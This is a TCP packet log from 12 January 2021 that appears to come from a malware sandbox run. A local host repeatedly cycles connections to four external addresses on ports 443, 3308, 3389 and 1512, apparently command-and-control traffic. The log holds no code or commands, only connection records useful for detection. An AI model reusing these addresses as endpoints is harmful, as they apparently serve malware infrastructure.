Jan 12, 2021 07:39:46.739509106 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.739528894 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.739542007 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.765212059 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.765249968 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.765413046 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.771449089 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.771473885 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.771610975 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.771688938 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.771722078 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.771795988 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.772767067 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.772798061 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.772840977 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.772870064 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.773850918 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.773873091 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.773914099 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.773933887 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.774379969 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.774437904 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.774441004 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.774482012 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.775469065 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.775507927 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.775546074 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.775587082 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.776634932 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.776670933 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.776709080 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.776734114 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.777808905 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.777847052 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.777880907 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.777916908 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.778733015 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.778770924 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.778795004 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.778827906 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.779817104 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.779854059 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.779901028 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.779942036 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:46.780898094 CET	443	49165	104.27.153.52	192.168.2.22
Jan 12, 2021 07:39:46.780976057 CET	49165	443	192.168.2.22	104.27.153.52
Jan 12, 2021 07:39:50.738527060 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:50.790929079 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:50.791054964 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:50.817599058 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:50.869777918 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:50.885082006 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:50.885185003 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:50.906064034 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:50.960623980 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:50.960797071 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:53.771533966 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:53.771706104 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:53.823781013 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:53.823971033 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:53.876080990 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:53.876105070 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:53.995552063 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:53.995585918 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:53.995704889 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:53.998235941 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:54.050309896 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:54.160124063 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.203273058 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.203377962 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.204463959 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.247400045 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.260102034 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.260130882 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.260202885 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.260248899 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.272284031 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.317621946 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.319829941 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.325984955 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.326034069 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.369260073 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.369451046 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.412578106 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.523586988 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.523617029 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.526674986 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.529481888 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:54.572508097 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:54.706532001 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.760962963 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.761105061 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.762152910 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.816747904 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.832983017 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.833012104 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.833193064 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.841635942 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.900646925 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.900727987 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.908478975 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.908628941 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:54.963406086 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:54.964209080 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:55.003181934 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.018309116 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.018349886 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.109762907 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.109803915 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.109942913 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:55.113332033 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:55.167691946 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:55.298923969 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.351804018 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.351891041 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.352802992 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.405642986 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.413619995 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.413661957 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.413710117 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.413733959 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.427025080 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.481272936 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.481379032 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.487106085 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.487215042 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.540642023 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.540858030 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.576719046 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.593656063 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.693958044 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.693993092 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.694113016 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.702148914 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:55.754961967 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:55.817214966 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:55.869271994 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:55.869499922 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:55.870456934 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:55.922308922 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:55.937339067 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:55.937429905 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:55.950556993 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.005130053 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.005296946 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.012994051 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.013185024 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.065057039 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.065258026 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.117253065 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.236032009 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.236074924 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.236260891 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.239403963 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:56.291321039 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:56.358275890 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.401489973 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.401737928 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.403039932 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.446185112 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.456759930 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.456789017 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.457047939 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.466955900 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.512039900 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.512253046 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.520006895 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.520258904 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.563301086 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.563452959 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.606628895 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.718758106 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.718794107 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.719017982 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.722495079 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:56.765646935 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:56.827056885 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:56.881365061 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:56.881782055 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:56.882733107 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:56.936666012 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:56.959728956 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:56.959760904 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:56.959819078 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:56.959846973 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:56.969521999 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.035105944 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.037213087 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.042862892 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.042968035 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.096760988 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.096987009 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.136096954 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.150976896 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.151005983 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.240708113 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.240736961 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.240911007 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.240967035 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.243356943 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:57.297668934 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:57.348264933 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.401176929 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.401398897 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.402837038 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.455550909 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.466372013 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.466398001 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.466530085 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.479973078 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.533862114 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.533989906 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.541697025 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.541918993 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.594566107 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.594741106 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.632668018 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.647456884 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.744313955 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.744343042 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.744395018 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.747828007 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:57.800781012 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:57.864790916 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:57.917061090 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:57.917160034 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:57.918212891 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:57.970328093 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:57.985172033 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:57.985255003 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:57.997411966 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.052321911 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.052503109 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.064434052 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.064650059 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.116673946 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.116864920 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.168839931 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.168967009 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.287519932 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.287542105 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.287789106 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.295470953 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:58.347776890 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:58.409802914 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.452923059 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.453015089 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.454134941 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.497607946 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.507888079 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.507914066 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.507977009 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.508171082 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.519583941 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.564460039 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.564646006 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.571638107 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.571799040 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.614877939 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.615055084 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.654263020 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.657998085 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.658024073 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.769809008 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.769860983 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.769993067 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.775693893 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:39:58.818840981 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 07:39:58.898324013 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:58.952631950 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:58.952734947 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:58.954242945 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.007956028 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.021976948 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.022027969 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.022068024 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.022099972 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.034965038 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.093528986 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.093763113 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.108828068 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.109030962 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.163014889 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.163264990 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.202688932 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.217061996 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.217091084 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.307883024 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.307904959 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.308206081 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.311865091 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:39:59.365912914 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 07:39:59.424259901 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.477092981 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.477226019 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.478646040 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.531435013 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.538145065 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.538167000 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.538254976 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.553339005 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.607527018 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.607706070 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.614219904 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.614429951 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.667171001 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.667429924 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.704821110 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.720139980 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.720160007 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.824542046 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.824568033 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.824729919 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.828638077 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:39:59.881272078 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 07:39:59.943526983 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:59.995582104 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:39:59.995666981 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:39:59.996838093 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.048521996 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.063389063 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.063484907 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.075774908 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.129981995 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.130059958 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.137839079 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.138077974 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.189759016 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.189915895 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.242181063 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.361591101 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.361614943 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.361814976 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.365240097 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:00.416946888 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:00.470201969 CET	49180	3308	192.168.2.22	80.86.91.27
